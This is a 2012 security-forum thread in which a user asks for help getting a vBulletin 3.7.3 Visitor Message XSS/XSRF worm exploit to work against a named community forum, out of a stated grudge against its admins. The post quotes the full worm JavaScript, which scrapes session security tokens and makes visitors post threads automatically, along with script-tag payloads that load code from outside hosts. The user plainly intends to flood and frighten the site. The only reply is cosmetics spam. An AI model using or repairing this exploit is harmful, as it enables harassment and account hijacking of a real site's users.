 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 232
 Members: 0
 Total: 232
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Need help with this vbulletin 3.7.3 exploit please? |
|
 Posted: Fri Aug 17, 2012 9:56 pm |
 |
|
| bringTDdown |
| Beginner |
 |
|
| Joined: Aug 18, 2012 |
| Posts: 1 |
|
|
|
 |
|
 |
|
Hello there is a website I would like to do damage to because the admins have been very harsh on me in the past.
The url is hxxp://www.thedugout.tv/community
I have found this exploit: | Code: | =======================================================
vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit
=======================================================
/* -----------------------------
* Author = Mx
* Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
* Software = vBulletin
* Addon = Visitor Messages
* Version = 3.7.3
* Attack = XSS/XSRF
- Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
+ with the visitor messages addon (a clone of a social network wall/comment area).
- When posting XSS, the data is run through htmlentities(); before being displayed
+ to the general public/forum members. However, when posting a new message,
- a new notification is sent to the commentee. The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
+ and I have included an example worm that makes the user post a new thread with your own
- specified subject and message.
* Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
* of the attack method.
* ----------------------------- */
function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}
function getAXAH(url){
var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);
function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);
var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);
var subject = 'subject text';
var message = 'message text';
postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');
}
}
}
}
function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);
function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
}
}
}
}
getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');
# 1337day.com [2008-11-20] |
I edited it and uploaded it to my webspace here: http://www.baz.s1x.me/worm.js
However when I post a "visitor message" of | Code: | | <script src"http://www.baz.s1x.me/worm.js"</script> |
(without the square CODE tags) it just posts it as text - and I have to delete it quick before anyone sees it.
Can anyone please help me with this exploit? I registered here especially for this after about an hour of Googling for answers.
I REALLY wanna get this to work so I can flood it with threads and make them scared. 
Thanks for any help. |
|
|
|
|
|
|
discount outlet hub |
|
| Posted: Mon Jun 10, 2013 1:08 am |
|
|
| wssimon |
| Regular user |
|
|
| Joined: May 27, 2013 |
| Posts: 6 |
| Location: as |
|
|
|
|
|
|
I recently came across your article and have been reading along. I want to express my admiration of your writing skill and ability to make readers read from the beginning to the end. I would like to read newer posts and to share my thoughts with you.
Wholesale Mac Cosmetics
Mac Cosmetics UK
Mac Eyeliner
Mac Lipstick |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
